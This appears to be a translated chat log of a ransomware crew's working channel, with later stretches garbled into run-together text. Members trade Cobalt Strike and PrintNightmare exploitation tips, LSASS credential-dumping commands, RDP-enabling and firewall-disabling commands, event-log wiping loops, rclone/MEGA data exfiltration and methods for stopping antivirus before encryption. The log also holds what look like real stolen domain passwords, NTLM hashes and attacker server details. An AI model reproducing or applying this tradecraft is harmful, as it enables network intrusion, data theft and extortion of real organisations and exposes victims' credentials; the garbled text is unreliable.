- in your browser (where .../cgi-bin/welcome) change the URL to https://target/cgi-bin/portal
- access the resource under the user's session
```
https://mega.nz/#!nBhlxLaT!3O9jgeDo5u0oCAxWDfEZsywsywpXKBpe6IS0CRvAC_7Ils Manual on Cobalt (ru)
Friends, if there is anyone from Ukraine, write to the PM. This is important.
The question is resolved by installing JRE 9.
The dialogue can be Ctrl + Plus.
Does anyone know how to increase the size of the Cobalt UI on a 4K 32" monitor? The entire operating system is scaled to 150% and the Cobalt takes your eyes out.
Throw 4.1 at least) because of the new hardware, there's nothing at all.) Didn't test it?
4.2 is like walking on the forum.
Can anybody throw the server part of 4.1 in an archive?
Hello everybody.
Hello, I'm going back to work this week, still cleaning up the mess of last year, but in touch.
Who else is resting at will can rest until Monday, because some of our partners will be away a week, but cases and work are there, so whoever needs, write to the PM today; I'll find and give out.)
@atom ask @terner
Hi guys, if someone has brute-forced mail, or knows some useful links, please share.
Without a hook, trying to run a hike; tried installing Cobalt 4.2, no way, eh. It says the wrong authorization file; it's in the one that was given here. Then went to the exploit forum, downloaded 4.2 cracked from there, and the same thing: wrong authorization file. I don't know what the hell happened.
Who already colored 2021-1675?
https://github.com/SecureAuthCorp/impacket don't throw tomatoes.) What's the implementation under impacket? Googled, didn't understand where to apply it.
Please write back if anyone successfully exploited it with a DLL; Cobalt at least.
Pick any hoster that accepts bitcoins, the rest is unimportant.
Got it.
@all hi; for VPN, suggest hosts for Linux?
https://github.com/cube0x0/CVE-2021-1675 exploit implementation right under impacket.
Rozetka suggested a working trick to change the date in cmd. If you get Cobalt telling you that your license has expired, do the following: in cmd change the date with the command date 01.07.2020. After that start Cobalt and change the date back. OpenVPN might complain about an expired certificate.
Try it on Win 7.
Didn't work on Win 7, still the same error, doesn't connect.
Hi.
```
192.95.20.8 u: Administrator p: iddqdidkfa!@#$IDDQDIDKFA
```
I ordered it, is it Canadian, so?
+support; hashes are shit.)
A fucking time-saver in raising the truth: https://securityonline.info/lsassy-extract-credentials-from-lsass-remotely/
Output, fuck. Would decrypting remotely output to a file? It simply has a switch /password; it should decrypt with it, but it doesn't work and I've never tried it. I'm not sure if SharpChrome writes into the file correctly... Was Chrome taken off remotely without the DPAPI key? Can SharpChrome take a script?
Histories in cmd. Sometimes there might be something useful.
RDCMan
Remind me please, what do you use to process servers through RDP so as not to clog the creds all the time? RDP manager, or so the software is called; thanks.
The video which is the main one from Alter's manual, like all.
Hello, please, how to properly use Get-GPPPassword.exe?
Obviously in MSF this is in the payload and arrives at the session; you can use the payload to execute code in cmd, for example to create a local admin, then authorize with it and drag the credentials.
exploit(windows/local/ms16_032_secondary_logon_handle_privesc): in case of successful exploitation, should it throw us a session in Cobalt from SYSTEM? Or raise a process as SYSTEM on the host?
And what is useful there?
Right, and I'm talking about the ntuser.dat file.
For taking hashes offline if you dumped NTDS from the PDC, just in case; I tried to use it and it failed: https://github.com/zcgonvh/NTDSDumpEx
I'll show now.
Who knows, is it possible to extract useful information from the ntuser.dat file, and if so, how to do it?
Who has used Little Snitch? PM a report please.
Useful things: http://morph3sec.com/Cheat-Sheets/Windows-Red-Team-Cheat-Sheet/ maybe it will be helpful to someone.
No, it's better not to make noise and use something from the native utilities, but psexec seems locked by Sophos and the service itself on the remote host doesn't start; and the psexec command is remote-exec psexec, maybe?
What does MSF not like then?
They also have psexec there.)
No, it's about the psexec utility itself being blocked by the AV.)
What's there to solve here, so bypass it.
Guys, didn't you have psexec blocked by Sophos? No one knows how to solve it without access to the console? Can't you do something in the registry or stick psexec somewhere in Sophos?
Yeah, I got it, thanks.
Then Ctrl+F and "Gigabit", that kind of thing. Exclude DB, SQL, FS. DB servers are either off the Internet or have security solutions (or should have). APP, MAIL, EXCH, PUB: just choose a server and call it from psexec \\remotecomputer systeminfo
psexec script systeminfo
Does anyone know if it's possible to check the machines' Internet channel to find a gig for pumping?
If anyone else needs it, we beat it this way: Adobe Flash Player, when trying to run content in browsers, redirects everyone to the site where it says end of support, and using the content doesn't work. But there is a solution: in recent versions there was a "time bomb", which is worked around quite easily: just change the date to 11.01.2021 and voila, content access.
```
for /F %%i in (hostnames.txt) do dir "\\%%i\c$\ProgramData\oracle\config\public" >> log.txt
```
Aah, bring it back. I'll test it, if it's still relevant and if I understand you correctly.) oracle: change the name of the software you need.
Who can make a simple binary?
Spec: there is a list of paths
```
\\hostname\c$\ProgramData
\\hostname1\c$\ProgramData
\\hostname2\c$\ProgramData
```
Take a listing. In the output we get something like
```
\\hostname\c$\ProgramData\oracle
\\hostname\c$\ProgramData\microsoft
\\hostname\c$\ProgramData\Adobe
```
Next, take the listing and put it in a file like this
```
dir "\\hostname\c$\ProgramData\oracle\config\public" >> log.txt
dir "\\hostname\c$\ProgramData\microsoft\config\public" >> log.txt
dir "\\hostname\c$\ProgramData\Adobe\config\public" >> log.txt
dir "\\hostname1\c$\ProgramData\oracle\config\public" >> log.txt
dir "\\hostname1\c$\ProgramData\microsoft\config\public" >> log.txt
dir "\\hostname1\c$\ProgramData\Adobe\config\public" >> log.txt
```
+ and a GUI on top of it.
Good morning, gentlemen.
Does everyone have expa?
Old browsers don't work, Ruffle doesn't come in, in the desktop console you can't see the plugins on the vSphere backup, HTML5 is not supported by the vSphere itself (old one). Has anyone encountered not being able to get into the vSphere web console because of the end of support for Flash Player?
Thanks, the same.
Gentlemen who already worked on 4.2: didn't you encounter the problem of a "dying" session when simply trying to open the Cobalt file browser? At first I blamed the AV, but after testing on my own dedi the effect is the same!)
a), but I don't need it anymore.) I got into LastPass and I don't really need it; actually I understand what you mean.) It was just a question, and then a link was given where to put it and where to get the hash, but the other options were thrown straight into the piggy bank.
Passwords from Chrome, and if there is a possibility, mutate all passwords from Chrome and brute-force.
Guys, do you have userdump.exe at hand, clean? The link is dead: https://www.microsoft.com/en-us/download/404Error.aspx
On GitHub there's a thread complaining about the script from harmj0y, so if you have an option online without having to dance with installing a Unix OS then it's better; John is the most capital variant, although I'm not particularly familiar with it yet.)
By the way, yes, note! That script at the link didn't work for me either! Solved with the one that came with the OS out of the box! Tried a couple of minutes ago via a script in Python, but it gave little output, maybe it's in the algorithms or so. I'm from Unix, I had J.R. Well! Thank you, faster.
http://hashes.com/en/johntheripper/keepass2john
https://www.harmj0y.net/blog/redteaming/a-case-study-in-attacking-keepass/
http://www.harmj0y.net/blog/redteaming/keethief-a-case-study-in-attacking-keepass-part-2/
@alter yes, the output is something like
```
Passwords:$keepass$*2*6000*0*221591f87534ede8b704227ec925802a78e8fd516b11278766f43a542e27cd22*68a3559c44bbc1d3ec8f59c646680915bd432b39f4e14f173666322ffc68e2b4*ecf2bf73bd822f1f94c4b9b2290ad93e*6f5515fc4fc3916729346e913060aaebe9f56383b32c554b35abaa03244ef65e*cbf8542495556206ddaf3cc7ab6064aba7eda33d410ab0deabf12500f87cd205
```
But don't forget to look at the config file; it's usually in AppData if the KeePass is not portable. From the configuration you can understand whether only a master password is used, or master password + login in the system, etc.
there are several variantsoknet should not be if you use the utility userdump.exe then the process will not die after the dump? To create a dump file for the sqlservr process, the command would be: C:\userdump sqlservr.exe sqlservr.dmp So is it dumping the running process? @white and how is it just dumping a password hash out of a cdbh file? just recently there was a case with keipass db password - thanks a look atJohon the Ripper dumped the hash perfectly, and then everything is classic, exactly no open copies of programs (hmm... thanks to memory find where kipass is running and dump it alivePlease tell me, found .kdbx but no pass, brute force pass from the grid did not give any success. What other options are there? Happy Holidays guys! Cloud Repository in viam - who dismantled it? How does it work? Hash with access decrypted, login pass and host are there. From external ipac scan nmap with checkbox -Pn bunch of ports - everything is closed. What is the protocol/port and how do I break the backups? i can't hear alex since friday, he's gone missing somewhere, i'm waiting for him i'll be here by eveningsonar take ayra and i'll give you a clean paleidlogin and pass i threw you the data on the download, go up to the admin at home, jumpyvoice through the smb login i found it [+] 10.19.222.47:445 - 10.19.222.47:445 - Success: 'calbeena.com\jkepley:Nellie69' Administrator [+] 10.19.222.50:445 - 10.19.222.50:445 - Success: 'calbeena.com\rfoltz:Money$123' Administrator on 1 vpn krede approached the time of the change of pasvidimoe you just got burned or the time of the change of pasvidimoe on which was vulnerability at me toopodtrivayte take local admin hash and puncture itpodobnoy i can pull 1 session and they have not validate this netair do as we jumped then sonar need to look for the kredeys these kredeys are not valid anymorecom\serveradmin:P8w7521!' Administrator session is deaddate with the downloaddetermine and on the downloaddetermine how to download ? 
COBA://104.238.220.89:59062 n9JidNWJmCwONb8g8codTqULgTzBXHrtuG ``That's the way to run it''. rundll32 name.dll, GetStdHandle ``beacon> jump again I gave you dllllpoe cmb ``beacon> jump psexec64 10.16.181.12 smb_L [*] Tasked beacon to run windows/beacon_bind_pipe (\.\pipe\npfs_8f) on 10.16.181.12 via Service Control Manager (\\10.16.181.12\ADMIN$\45bae58.exe) [+] host called home, sent: 291438 bytes [-] Could not start service 45bae58 on 10.16.181.12: 2 [-] Could not connect to pipe: 2 ``````
``Which dll jump my not come session all hello jumped ?how are you doing ?pull on cmb port for vmik is closedERROR is climbing: Description = The RPC server is unavailable.when I want to pull up[+] 10.19.222.57:445 - 10.19.222.57:445 - Success: 'calbeena.com\amondragon:AlPe$7148' Administratorokay I will run myself) (I do not have a server with metasploithere that was and look for koboya I'll give you a soxmozhet to cmb run servers? and send data to kobipid552460 kobaa what koba and what pid?so here's the sortez gentlemen)will assemble addaway jump excellentnot yet slitherode found a stable connection morning picking up normalvpn rises but after a minute drops out because the users on the course reconnectokshcha i will raise i have a dedicle all hey just go to him ping modet just firewall closed should load the dedicle and does not ping so far what with the guys can i dedicate or while with the guys?sonar will check in 5 minutes and it will be ok by evening I do not have a wake-up call, do you have the ddik?hi all hello@Air[ ](https://stylebrooks.com/group/conti?msg=9NrF3MDkPoHiWyd3D) rumor has it that the number of threads can be reduced as an alternative to samba. are there any interesting options how to debug without a test? what to test, apparently avers started fighting in their circle, a couple of months and all this to vedutuga i understand can take the av and test if such a thing and he does not give a sale to the averlockehr.exe -p \\host\c$ and eh and the dll? 
when started from a foreign process or from the hard drive? sofos TM kasper two or three months and all the avs will enter =) there may still be a chance to revive the method need to debuginethe securiti like kasper? or kasper antiransom suite? not encountered but I think the injector to patch kasper started to paralar lock + TM probably also anyone else had a problem with what? by the way, also saw this arbitrage, 7kk) dzhe chem with this, each other rolled up, although the ransom was not, tinny))) ``` there marazmibo with default -size 50 you need to rerun 7.5tb, it takes a very long time (= do not have time) locally but put -size 10 or -size 20 inside operations there is another folder with the same contents, inside this folder there is the same folder with the same contents etc When I downloaded the date all zips grabbed this folder and download the same files, but if you consider recursion there is a tb 15, but in fact the original date there at 500gb where is the recursion?guys,does anybody know if there's recursion in a folder then the locker will encrypt the same folders again and again until recursion ends? for example Y:\operations\operations\operations\operations, etc. By the way, I also saw this arbitrage, 7k) I don't know what will come of it, they'll bait each other, although there was no ransom, trivia)))PR:Dinteresting)) [10:32:11] 8-800-555-35-35: there are no such top lockers left on the market. 
[10:32:18] 8-800-555-35-35: maze aka egregore gone [10:32:22] 8-800-555-35-35-35: Conti's gone ``` here's what unkn writes, found in the arbitration on the xdex, you cling to it, on the virtual machine you raise Kali\backbox you can walk around and the fortress doesn't care about it wantkn, don't use cobalt) i tried to wrap the route to the timeserver through my gateway is there any way around it?and there is something that cuts your connections when you connect the VPN - your network connection goes through the internal network of the company I checked the routes, fortik can proxy or what?and if the firewall - there may be a whitelist tls handshake, that's how) i mean how the routes are fine or the firewall is twisted, in any case, it's from the side of the network defenses, but how?ids blocks you, traffic to the coba begins to go through the internal routing when you connect to the vpndavay look at itself is a virtual machine and from there podrobivyte on dedik virtualkuping to timeserver goes, the route does not change the connection on the rdpvpska flies away from the hookupre guys, hey, who had this, connect the fortik > flies off the server from cobaGrimnirCodeocta0dayinbizChucktu@topuy write please feedback on tulchin what is not working what is not clear how it works what to add what to remove When you click on spread a window opens with 5 fields 1 In the first field you have to choose a path to the artifact file to create sessions or exe/bat/dll file for the payload 2 In the combo box select wmi/plsexec method 3 In the third field you must enter the default path to load the file as "C:\ProgramData". 
4 In the fourth field select the path to the list ip/host 5 In the start line you enter arguments, if there are no arguments you just need to press Run Spread 6 By pressing Run SpreadForms a request to the domain to the controller ip/host from the list in response comes the addresses to the target hosts 7 Forms UNC path to target directory 8 Paths are sent to download function and it loops to download the selected file. 9 After a timeout of 10 seconds (this timeout can be adjusted), to be sure the file is in the chosen directory, a startup command is sent with arguments (if they are given) ``@all together update all those who use enhancement_chain.cna main.cna Import Pay special attention to Other->Lateral this is a tool to distribute and run eh/dll files through a list of hosts/ipacsnimbus2000 will work this weekend ? hello there + hello there ! anyone alive ? i will write to him log on to the iphone from the dedicat and jump there brad has a tsktak you said with food to do, but now wait till you can get on the rdd can do it with brad chase the net with the iphone what to do yes i told you there is work ?vampirnot yet have a job mubea + hey all, stevie, i got nothing to do (search for passes in the kipasa not take into account) all hey, what do i do today, i'll give you something soon what to do? thank you[ ] (https://stylebrooks.com/group/general?msg=cFaT9BfhcCaaXdoKH) here's the bro, here's a guide how to use the shuttle so you do not separately porting, i did not put it right ``` https://defcon.ru/network-security/3789/ it's a really interesting thing) @cybercat can you show me what it's about? > https://sshuttle.readthedocs.io/чет I only found in the instructions how to wrap traffic, I do not see how to forward ports, port forwarding@cybercatsa as far as I understand it on the client then you can for example raise proxy, I glanced up, it is vpn via ssh server without administrative access, got it right? mysql? 
Guys, do we have any whining pros?:sweat_smile:on the githab who made a new proxygon? if you can't connect to ipn then you can unpair the ipn users from AD and brute force them, not all domain accounts are blocked if you connect to ipn but you need to take the domain again. I had one login last night and got kicked out. can i have a panic attack on my account?[ ] (https://stylebrooks.com/group/discussion?msg=tLMMQuqQ59Kvu9dDu) In general, there is a VPN check on the ms17 for starters) and had to remove the local admins from the cars) so if the vpn broke the aces as you turn to the dk? Guys! All have a good start to the week! No such fucks like us) In general, there is a VPN. And all. All accounts are blocked, the admins burned the activity. ZeroLogon defrauds from the VPN? Can I try it from the VPN? But I need to somehow pull the DC. Is there a point to fight? ``` -v ``and there will most likely be an error there will show all that thinks about you)I will try, thank you and what gives this flag? --verbose there may be a problem with this flag... add ``verbose flag'' to the rootclone... add ``bose flag'' to the rootclone... 
does it work at all?people, what do you think may be the case - rklon could not pull the archive size of 11gb, time was plenty, but when I unloaded the folder, there is no problemspasibut look here convert = http://www.hexadecimaldictionary.com/hexadecimal/0xd3d/REG QUERY "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber If it doesn't work, check the RDP port used therereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKLM\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" netsh firewall set service remoteadmin enable netsh firewall set service remoteesktop enable netsh advfirewall set allprofiles state off netsh firewall set opmode disable Hi, I need to use the VMIKEK or VMIKEK from the impacket. Could you please tell me how to open port 3389 remotely. I used a command via batnick and remote-exec psexec does not work. ``reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f netsh advfirewall firewall add rule name="allow RDP" dir=in protocol=TCP localport=3389 action=allow I think some kind of key is specified in the general topic today can not work with bicon, from cmd have to. i do not know how to pass the parameter password, with bicona google the key all i understand in the launch string password is specified@ATX and you start from bicon ? you can join cps tunnel through ngrok, create a separate ssh account and ipac will hide behind ngrokommega locate, so reservers copy should always have. 
and ftp/sftp abuzz tooa about the ban account - it's clear, just what's confusing, what these fuckers did not delete ni mega nor configsynchronization is configured if korp write abuzz on the mega, indicating a specific ak, and there is one username\login enough, then in theory may ban the akda for nothing. Ideally, put mega software on the deck - megasinh, and immediately synchronize remote folder from the mega to your granddisk, and it turns out, all that downloads rklon simultaneously synchronized to your granddad thanks brother, of course I was stupid look at you dolboycher I if you do not put a password in the config - mega account in the config in the open form# Encrypted rclone configuration File RCLONE_ENCRYPT_V0: ch1QBcoL8zkZ1B2IVQtV00DqEkBAKMpJEJFz1k4iEKNwVHICSBHS9nGgT6Fx1ucyHRd4GKC/jlsAWtwhpNkFpSN0LzEJeth9AtMqoIMIo+Y+p9TZybEGu9Ba8xjj2BjqFW61xy773gNElFXVOcwxAcYXq4yIWFuiMk2X if to put a password in the pclone config, the config looks like this, you'll have your mail stolen, as far as i know, when you create a config, there рclone encrypts only the password and you encrypted the config with the password?haven't heard such a thing, hello everyone, has anyone experienced mega account blocking when you drag there date pclone ? 
just at me pklon itself and config file in place, and the account is blocked, usually, if the network palyat rklon, then it then you can not find, because it deleted, but here everything is in place and the account in the block.toomochaniya there multithreading is set to 100 or so if you will use through sox put a flag -t15 or 20[ ](https://stylebrooks.com/group/discussion?msg=dRuYGZwajMWKbTJiq) the most effective solution[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=doNK6ztT6DHJALcin) can give vpsku with meshcrackmapexec through sox trya although no, not a fact, I am stupid uene 5-10-15 try to catch account lockoutCertainly know where the user can go where not.Guys, there is a way to check the cracks on all machines as that from the kobe? Where to go where not. Pro MSF I know, but is there a quick solution? As MSF is not up, there is no other software, and if mimicatom from the disk clear the fuck will eat all the software and its libs in the context of the session process in general as I know mimic in cobalt works in memory randll32 but now with hands without a koba, i can't do it with cobalt because it has a different working principle and sometimes with avs it's ok, but if you work with cobalt, you can't inject with vin10 mimicatz verushelny in principle any AV will fuck you up) mimicatz on verushelle is ok, because vin10 has amsi and defender will fuck you up as well look it up defender is sure to fuck up such an injection hook and is much more productive with hooka got it, it's clear enough if you're lucky in a day or two remove the password from the dumpdump then there plug in the key to vdigest and sit back and wait look where your man goes most often, If you need a password by cleartext I would do it this way but it will disappear if the user leaves. 
The principle is the same if you put the key on the vdigest and wait for the user to log in - cleartext pass will be in the lss memory when you have to reboot in cis32 and then it also records all logging in but when it is injected, when a user logs in, the user's pass logs into the textam in order for your password to fall admin must enter ita Didn't you re-login when you used memssp? is there a cleartext pass falling to you right away?[ ](https://stylebrooks.com/group/discussion?msg=Qra2wRNbginGMesge) no, it's ok) maybe there's other software this hook can do more than just mimics without any dumps of lsas and will write them in text, then wham, and wait till everyone is re-logged. i asked, maybe there's a more legitimate way, it's death to unlogin admin) or it's an inject to rewrite completely (in fact we came to the same thing) put the dongle in the register, unlock it and wait when the lsass dumps comes in, remove it, i think it will be more safe than with the injectorPlus to intercept the cache you have to wait for the user to log in the injector there is fucking dirty by default) it's an injector to intercept the cache from the wdigestoran, you shouldn't have done that it's not a dumpy read on memsspd I've injected it and got it all)in server 12 and 16 you'll get the same hash if you don't plug in wdigest[ ](https://stylebrooks.com/group/discussion?msg=dGJqSBgsfkkmHtm9n) in the ten lssass does not store passwords in plain sight then you stick vdigest on the host where the admin goes, unlogin him and wait and need only inject lssass)) password may be one of the admin, and I do not have them, to hash, say I have a bakup software, on the password you can enable through the hash and walk through it you do not always need a password cleartextom more this password can be not only on the account of the administrator and also where else will fit, korochki need cleartextom brute force?but brute force, there are passwords Ecx8$U*mn<[CD)G\==and if he got out, his 
account may not be in lasas, projektil and wait, the user logged in and it just entered the text yes as a variant through the registerdigest null because it needs to be enabled separatelysince it is clear with you these are service accounts for spn and kerberos* Username : mccadmin * Domain : OPTECH * NTLM : * SHA1 : 254543e7093d803131503226a5c8e549ad27ed4c7f [00010000] CredentialKeys * NTLM : * SHA1 : 254543e7093d803131503226a5c8e549ad27ed4c7f tspkg : wdigest : * Username : mccadmin * Domain : OPTECH * Password : (null) kerberos : * Username : mccadmin * Domain : OPTECH.LOCAL * Password : (null) Watch the fucking example, what's this got to do with the local service, anywayUsername : OPT-CORP-DC-01$ What's this? [00000003] Primary * Username : OPT-CORP-DC-01$ * Domain : OPTECH * NTLM : 591f790562e7f99d27dd870930fecdb7 * SHA1 : c9b9e72ca2feb38411e67834ec07c026a18dd791 tspkg : wdigest : * Username : OPT-CORP-DC-01$ * Domain : OPTECH * Password : (null) kerberos : * Username : opt-corp-dc-01$ * Domain : OPTECH.LOCAL * Password : (null) Fuck, you can't do anything like in the examples above and you can send me the hashes and I'll give them to the brutts. because this is User Name : LOCAL SERVICE Domain : NT AUTHORITY[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=fqBSRP3ib4dprsZqP) +is an example of simplicity when you inject into Lsass you get the same as when you dump the memory Greetings. On the updated W10 and WServer2019, this feature "misc::memssp" no longer works. After its launch, Windows goes into reboot immediately. He writes that there is a problem and needs to reboot. Tested on more computers. In general, can it be fixed somehow? ``It's pretty much null by default, tell that to 10k and its server versionmay it not bother you that this is a local service? 
Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 3/14/2021 4:49:43 AM SID : S-1-5-19 msv : tspkg : wdigest : * Username : (null) * Domain : (null) * Password : (null) * kerberos : * Username : (null) * Domain : (null) * Password : (null) ssp : starting with server 2012 and win 8.1 wdigest is disabled under wdigest?there will be the same as in the live dump and with the hash you can not log in by rpvsm zulenolol, and there passwords are all zulenolenny you reinvent the wheel need just dump lsass and all lolvariants to work with getting credentials two, this is one of the options, the second is dipping mimilib into the folder system32, using the right command and reboot, allows you to write the credentials into the txt, but mimilib firewall and in cis32 will fire for sure, it would be quiet if it was not firewalled, I do not know if you need a static or randomprivilege::debug misc::memsspmimikatz misc::memsspmimspp The above is a logopassword in any case either vinapi or something else is involved[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=Bby9uZL9qAnHbL2Hd) tell me the name of the command you want to run in mimic and crypto won't help you crypt is static, the method of injection doesn't change over timeaah you probably don't know what i mean, ok the first way is more dangerous than the second you either inject live and look at the memory lsass or take a dump and look locally in your room what you've thrown at him how to dump the lsassnoozhnu apparently crypt dll and ehashnika so without mimicry above tossed variants)with mimic psh not do takoenu so we're you about what we're writing here) in tekstovik) that would get all logged in lsasstask manager, prokdump sure stray, but not all AV I aim hard if there rdp through the task manager quietest will be, I thinkIf you have a lsass dump, it will be the quietest thing to do, I think: ``` Dumping lsass 
without mimicatz 2. 2.1 Create a minidump of the lsass.exe using task manager (must be running as administrator): open Task manager by Administrator 2.2. find lsass.exe 2.3. right click on lsass.exe 2.4. choose Create Dump File (you will see path to dump, f.e. it is "C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP") [2.5. switch to mimikatz > sekurlsa::minidump C:\Users\ADMINI~1.OFF\AppData\Local\Temp\lsass.DMP > sekurlsa::logonpasswords] - 3. procdump 3.1. cmd.exe > procdump.exe -accepteula -ma lsass.exe lsass.dmp //or avoid reading lsass by dumping a cloned lsass process cmd.exe > procdump.exe -accepteula -r -ma lsass.exe lsass.dmp - 4. comsvcs.dll 4.1. .\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump 624 C:\temp\lsass.dmp full - ??5. ProcessDump.exe from Cisco Jabber ``There is a slightly modified version for especially hard ABs default dumper is not fud, in static at least, not dropdown to disk on dotnet as I recall dumpertwin defender (even for lsass dumps) but NOT obfuscated stinks badly try to take pawershelf mimic - here you may download it ```. https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1 https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1 ``` different in volume, I don't know why and try to obfuscate there are ps obfuscators[ ](http://wfy76wigkpoxqbe6.onion/group/discussion?msg=hGGZc6EzTxzxTcdCJ) as an option, you can use Invoke-Mimikatz.ps1, and replace the keywords there with your own, a lot of averov statically steal the word mimikatz (I do not claim, but read about it) have any crypto mimikat?i can replace ²sassui with other servers, such as fs or kdo look at the attribute logonCount in ADparalyat at once all the fuckin' popeasuyutabayut admins go to 24 hours and there is no there often go i think it all depends on the specific case and the case for the most part. how often admins generally go to servers? who knows? 
What is the likelihood that, for example on the shul servak will enter the administrator in the working day? Codeneconnect your account to the office on the deck and dump everything ... so there's like office365Men who worked with ovh.com; export a box or migration of history on another server interestsdzhudponalya know setyat more he already received, and I do notprivet, and when we and Alex and mlsf give deediki and servers under the msf? We are waiting for aha thanks)-rtt means recursion (r), and a command to pack by date of change (tt) normally everything is packaged with recursion to properly archive the folder again, `-tt` is FROM a given date, `-t` is BEFORE a given date-command -rt is recursive, but what would be without recursion should be written without r in -rtt that is -rt. it is clear that mush is not clear, where the error in the command or description? ZIP FILES BY DATE OF CHANGE zip -rt 2018-01-01 C:\Programdata\zip.zip C:\users\admin\Documents\ - packs recursively (without recursion, remove r in -rt) all files in Documents folder to zip.zip archive before specified date, ie it will download all documents before 2018, older do not take If by any reason it is necessary from 2018,then write -rtt (if without recursion just -tt) ``+hz, maybe everyone already knew this but me, but still: the task was to run a shairfinder from a non-domain car(dedicatee) via wpn, solved by calling the pvershell via ran s, ``` runas /netonly /user:domain.local\user powershell ``` and from there shairfinder, the output is there, use it at your pleasure By the restPars, does anyone have problematic cases - taken YES, but there is no way to break through because of the AV ? In particular sofos. 
Draughts in private, have an idea how to solve the inside of the script probably need to enter the domain instead of None who yukal https://github.com/Yt1g3r/CVE-2020-0688_EXP there is a problem with the execution, the authorization gives the correct, but then the error, who encountered? pm@kalinka fixed sofos like this option, did not work in extreme cases[ ](https://stylebrooks.com/group/general?msg=2MNvAuFf3HxmhQ6iZ) tried? in 2 cases tested - no cooze and it's not afraid of avsam reboot pknado lokera functionality as revil heard there, it is registered in the reboot, in safe mode and locosofos handpoint can be knocked out by pvsh script, but you need to reboot me now there is a grid here italy, and here sofos on password too, i found a panel, but i do not understand the fuck out of it. i dont know if it's the same or not. i thought i could paiload and lock.@Shved but if the koba crypt and spread paiload and then dll lock, why not an option?:muscle:thanks, so will do) find some quiet servers and drain them.hello everyone. Who can help with the grid lock? The rights are up, the data is pumped out. Main domain(175serv online) + 2 trusts(~40serv online). The problem is that there are sofos with password everywhere. Finding the passcode from sofos is not possible. Any changes in sofos settings are restricted, the maunty lock will not work, although the cars without AB is. Need a man who can cut / stop sofos. Otpisit in pm, who knows how to fight sofos.me at any time, but it is recommended at night. at your own riskvshey all hello! clue me, the date usually put the drain during working hours on the grid or at night? if there just need to activate cheto no problem shops, banks are sure palyatatse who palyat* google voz like palyatam straight under the state can choose a number google voziteVice very necessaryPriest Does anyone have an option for a permanent sim card in the US to take a few sms? 
Activator mb in contacts + is VERY important in terms of getting access@all TO ALL, urgently. Within two days in networks where you work with the rights and where there is an exeChenge check whether vindef on these exeChenge servers@all call me in the confab please, where you need builds lockershttp://rmusser.net/docs/Active_Directory.html@all 209.222.97.78 - whose grandfather? don't connect to him@all laurent-perrier.fr don't see the case thisjask[ ](https://stylebrooks.com/group/general?msg=6hvXr8S7ES64vC8qH) on the git in the manual says what could be easier python -m pip install but simpler could be python -m pip install impacket from the downloaded release folder, not the master branch It may complain next that there is no readline module pip install pyreadline and in general, to access python not through the path, but through a variable, when installing python, you need to add python as a system variable (just check the box when installing) it's all if the wind to install, on the lin say just downloaded from the git and everything works (on the disk inside the network do not drop, only from under soks or vpn with his vpska) https://github.com/maaaaz/impacket-examples-windowsимпакет not installed. what is your problem? yesecretsdump that? well, yes, let) here is the link to the original source, as I understand, based on which is written about ms chachhttps://www.ired.team/offensive-security/credential-access-and-credential-dumping/dumping-and-cracking-mscash-cached-domain-sofar, wandering around our forum and came across a thing called ms chach, did anyone manage to run a python script that pulls the necessary information ? or maybe someone has a way to get the info fast ?wanted to netsapp therein palyfakt dlltut still in progress what's up ? @giovannielefant in the wrong channel threw the man just = )ahahahhapriet - goodbye ? :D hellohelloworld123 hellohelloworld123 hello go to the group all hello ! when will we start raping mubey ? 
CMD5 Email: arsahgg314@yandex.com Password: faA3g$^@fdzf@4 Try and bypass the VPN requirements by specifying the domain on the machine you connect frominvpntax it didn't connect here how do you do ?kkpost on brut plz If it's not hard to check this one more 80fe4359c69cbf41f2b46b620533dc6d have you been able to scrub? cmd5.org can't takevampiru steven had a workout@all hi gentlemen. If memory serves me right, someone here has rklon from memory share info how and what ?@all who has a file on msf tcp_rc4 listener? clean of course)4 @atombatnik for cleaning logs can still do so: ``for /F "tokens=*" %%1 in ('wevtutil.exe el') DO wevtutil.exe cl "%%1" `````` Cleaning Logs 1 Run the PowerShell console with administrator privileges and use the following command to list all the classic event logs available on the system with their maximum size and the number of events in them. Get-EventLog -LogName * 2 To clear all event logs, we would have to redirect the log names to the pipeline, but unfortunately this is not allowed. So we have to use the ForEach loop: Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log } 3 For the event handling in Windows there is a powerful command line utility WevtUtil.exe available for quite some time. 
